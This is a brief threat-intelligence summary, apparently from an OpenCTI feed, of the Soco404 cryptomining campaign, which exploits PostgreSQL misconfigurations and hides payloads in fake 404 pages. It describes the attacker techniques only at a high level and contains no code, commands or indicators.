Multiplatform Cryptomining Campaign Uses Fake Error Pages to Hide Payload

SUMMARY :

A new iteration of a broad cryptomining campaign, dubbed Soco404, has been identified. The attackers exploit vulnerabilities in cloud environments, particularly targeting PostgreSQL misconfigurations, to deploy cryptominers on both Linux and Windows systems. They use process masquerading, achieve persistence via cron jobs and shell initialization files, and rely on compromised legitimate servers for malware hosting. The malware communicates via local sockets and embeds payloads in fake 404 HTML pages on Google Sites. The campaign is part of a larger crypto-scam infrastructure, demonstrating a versatile and opportunistic operation. The attackers use multiple ingress tools and target various entry points, showing a flexible approach to maximize reach and persistence across diverse targets.

OPENCTI LABELS :

cryptomining,persistence,cve-2025-24813,compromised-servers,process-masquerading,multiplatform,fake-404-pages,postgresql,crypto-scam,soco404


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Multiplatform Cryptomining Campaign Uses Fake Error Pages to Hide Payload